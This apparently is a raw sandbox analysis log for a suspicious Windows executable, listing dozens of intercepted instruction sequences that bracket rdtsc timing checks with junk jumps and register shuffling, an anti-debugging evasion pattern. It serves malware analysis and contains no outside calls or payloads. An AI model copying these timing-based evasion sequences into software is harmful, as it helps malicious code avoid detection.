Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20715 second address: 4B20724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA52B3CABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20724 second address: 4B2077B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [774365FCh] 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ebx 0x00000010 mov esi, 21940EF9h 0x00000015 popad 0x00000016 test eax, eax 0x00000018 pushad 0x00000019 push eax 0x0000001a mov edi, 5A083A84h 0x0000001f pop edi 0x00000020 pushfd 0x00000021 jmp 00007F8EA4E2EA4Ah 0x00000026 jmp 00007F8EA4E2EA55h 0x0000002b popfd 0x0000002c popad 0x0000002d je 00007F8F176C1C46h 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F8EA4E2EA4Dh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B2077B second address: 4B20781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20781 second address: 4B20785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20785 second address: 4B20789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20789 second address: 4B207F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007F8EA4E2EA4Fh 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 jmp 00007F8EA4E2EA4Fh 0x00000017 and ecx, 1Fh 0x0000001a jmp 00007F8EA4E2EA56h 0x0000001f ror eax, cl 0x00000021 pushad 0x00000022 push eax 0x00000023 movsx ebx, si 0x00000026 pop eax 0x00000027 movsx edx, ax 0x0000002a popad 0x0000002b leave 0x0000002c jmp 00007F8EA4E2EA4Eh 0x00000031 retn 0004h 0x00000034 nop 0x00000035 mov esi, eax 0x00000037 lea eax, dword ptr [ebp-08h] 0x0000003a xor esi, dword ptr [00192014h] 0x00000040 push eax 0x00000041 push eax 0x00000042 push eax 0x00000043 lea eax, dword ptr [ebp-10h] 0x00000046 push eax 0x00000047 call 00007F8EA97FF171h 0x0000004c push FFFFFFFEh 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov ch, 85h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B207F3 second address: 4B207F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B207F9 second address: 4B207FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B207FD second address: 4B20818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B20818 second address: 4B2084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F8EA97FF1B0h 0x00000011 mov edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8EA4E2EA57h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B2084C second address: 4B20928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushfd 0x0000000f jmp 00007F8EA52B3CB9h 0x00000014 jmp 00007F8EA52B3CABh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007F8EA52B3CB9h 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F8EA52B3CACh 0x00000029 jmp 00007F8EA52B3CB5h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F8EA52B3CB0h 0x00000035 and si, 0228h 0x0000003a jmp 00007F8EA52B3CABh 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F8EA52B3CABh 0x0000004c adc ax, E36Eh 0x00000051 jmp 00007F8EA52B3CB9h 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0055 second address: 4AD0071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA4E2EA58h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0071 second address: 4AD008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD008A second address: 4AD008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD008E second address: 4AD0092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0092 second address: 4AD0098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0098 second address: 4AD00D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F8EA52B3CB3h 0x00000017 pop eax 0x00000018 jmp 00007F8EA52B3CB9h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD00D8 second address: 4AD010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bl 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F8EA4E2EA4Eh 0x00000015 jmp 00007F8EA4E2EA55h 0x0000001a popfd 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD010C second address: 4AD012C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cx, 0641h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD012C second address: 4AD0130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0130 second address: 4AD0148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0148 second address: 4AD015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA4E2EA4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD015A second address: 4AD015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD015E second address: 4AD0196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F8EA4E2EA57h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8EA4E2EA55h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0196 second address: 4AD019C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD019C second address: 4AD01A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD01A0 second address: 4AD01E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F8EA52B3CB4h 0x00000010 or cl, FFFFFFA8h 0x00000013 jmp 00007F8EA52B3CABh 0x00000018 popfd 0x00000019 mov bh, ch 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F8EA52B3CABh 0x00000022 mov ebx, dword ptr [ebp+10h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD01E5 second address: 4AD01EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD01EC second address: 4AD01F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD01F2 second address: 4AD01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD01F6 second address: 4AD01FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD01FA second address: 4AD0269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a call 00007F8EA4E2EA50h 0x0000000f pushfd 0x00000010 jmp 00007F8EA4E2EA52h 0x00000015 sbb ax, 5A98h 0x0000001a jmp 00007F8EA4E2EA4Bh 0x0000001f popfd 0x00000020 pop ecx 0x00000021 mov ecx, ebx 0x00000023 popad 0x00000024 push eax 0x00000025 jmp 00007F8EA4E2EA52h 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8EA4E2EA57h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0269 second address: 4AD02F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov dh, 21h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F8EA52B3CAAh 0x00000013 xchg eax, edi 0x00000014 jmp 00007F8EA52B3CB0h 0x00000019 push eax 0x0000001a pushad 0x0000001b mov cx, di 0x0000001e mov ecx, edx 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F8EA52B3CB5h 0x00000029 add eax, 37CA5456h 0x0000002f jmp 00007F8EA52B3CB1h 0x00000034 popfd 0x00000035 call 00007F8EA52B3CB0h 0x0000003a pop ebx 0x0000003b popad 0x0000003c test esi, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F8EA52B3CB6h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD02F8 second address: 4AD02FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD02FE second address: 4AD03CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8F17B91FABh 0x0000000f pushad 0x00000010 mov si, F0DDh 0x00000014 call 00007F8EA52B3CAAh 0x00000019 movzx esi, dx 0x0000001c pop ebx 0x0000001d popad 0x0000001e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000025 pushad 0x00000026 mov cx, 056Fh 0x0000002a mov edx, esi 0x0000002c popad 0x0000002d je 00007F8F17B91F98h 0x00000033 pushad 0x00000034 pushad 0x00000035 mov esi, 2F401CB9h 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d pushfd 0x0000003e jmp 00007F8EA52B3CB4h 0x00000043 or ch, FFFFFFC8h 0x00000046 jmp 00007F8EA52B3CABh 0x0000004b popfd 0x0000004c popad 0x0000004d mov edx, dword ptr [esi+44h] 0x00000050 jmp 00007F8EA52B3CB6h 0x00000055 or edx, dword ptr [ebp+0Ch] 0x00000058 jmp 00007F8EA52B3CB0h 0x0000005d test edx, 61000000h 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 pushfd 0x00000067 jmp 00007F8EA52B3CADh 0x0000006c and ax, 2746h 0x00000071 jmp 00007F8EA52B3CB1h 0x00000076 popfd 0x00000077 mov ch, 75h 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD03CB second address: 4AD0400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8F1770CCF5h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F8EA4E2EA4Ch 0x00000018 xor cx, B718h 0x0000001d jmp 00007F8EA4E2EA4Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0400 second address: 4AD043D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ah, 80h 0x0000000b popad 0x0000000c test byte ptr [esi+48h], 00000001h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8EA52B3CB8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC084C second address: 4AC0850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0850 second address: 4AC0856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0856 second address: 4AC085C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC085C second address: 4AC0860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0860 second address: 4AC088A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8EA4E2EA51h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8EA4E2EA4Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC088A second address: 4AC08B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8EA52B3CB7h 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 movzx ecx, di 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC08B1 second address: 4AC093C instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, 7F954EDAh 0x0000000c popad 0x0000000d and esp, FFFFFFF8h 0x00000010 jmp 00007F8EA4E2EA51h 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F8EA4E2EA4Eh 0x0000001b push eax 0x0000001c pushad 0x0000001d mov si, bx 0x00000020 pushfd 0x00000021 jmp 00007F8EA4E2EA4Dh 0x00000026 xor eax, 3CDDBEB6h 0x0000002c jmp 00007F8EA4E2EA51h 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 jmp 00007F8EA4E2EA4Eh 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b mov ebx, ecx 0x0000003d jmp 00007F8EA4E2EA4Ah 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F8EA4E2EA4Eh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC093C second address: 4AC094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA52B3CAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC094E second address: 4AC0962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 4763DD5Fh 0x00000011 push ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0962 second address: 4AC0968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0968 second address: 4AC096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0AA1 second address: 4AC0B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cl, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c call 00007F8EA52B3CB4h 0x00000011 pushfd 0x00000012 jmp 00007F8EA52B3CB2h 0x00000017 sub ecx, 16972328h 0x0000001d jmp 00007F8EA52B3CABh 0x00000022 popfd 0x00000023 pop esi 0x00000024 mov dx, FF6Ch 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F8EA52B3CB2h 0x0000002f xchg eax, ebx 0x00000030 jmp 00007F8EA52B3CB0h 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 mov si, F2CDh 0x0000003b jmp 00007F8EA52B3CAAh 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F8EA52B3CABh 0x00000047 xchg eax, ebx 0x00000048 jmp 00007F8EA52B3CB6h 0x0000004d push dword ptr [ebp+14h] 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0B4D second address: 4AC0B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0B51 second address: 4AC0B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0B55 second address: 4AC0B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0B5B second address: 4AC0B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA52B3CABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AC0B6A second address: 4AC0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0D69 second address: 4AD0D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0D6F second address: 4AD0D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0D73 second address: 4AD0DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8EA52B3CAEh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov cx, 4DEDh 0x00000014 mov bx, si 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8EA52B3CAEh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0DA8 second address: 4AD0DB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0B2A second address: 4AD0B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0B2E second address: 4AD0B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0B4B second address: 4AD0B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0B51 second address: 4AD0B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0B55 second address: 4AD0B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 1F44230Bh 0x00000012 mov edx, eax 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8EA52B3CB8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0B93 second address: 4AD0B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4AD0B99 second address: 4AD0B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B50627 second address: 4B506A8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8EA4E2EA4Eh 0x00000008 adc si, 6788h 0x0000000d jmp 00007F8EA4E2EA4Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 jmp 00007F8EA4E2EA54h 0x0000001d call 00007F8EA4E2EA52h 0x00000022 pushfd 0x00000023 jmp 00007F8EA4E2EA52h 0x00000028 or ah, 00000048h 0x0000002b jmp 00007F8EA4E2EA4Bh 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 mov dx, cx 0x00000038 mov bx, ax 0x0000003b popad 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B506A8 second address: 4B506AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B506AC second address: 4B506BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B506BB second address: 4B506D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA52B3CB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 4B506D3 second address: 4B506D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
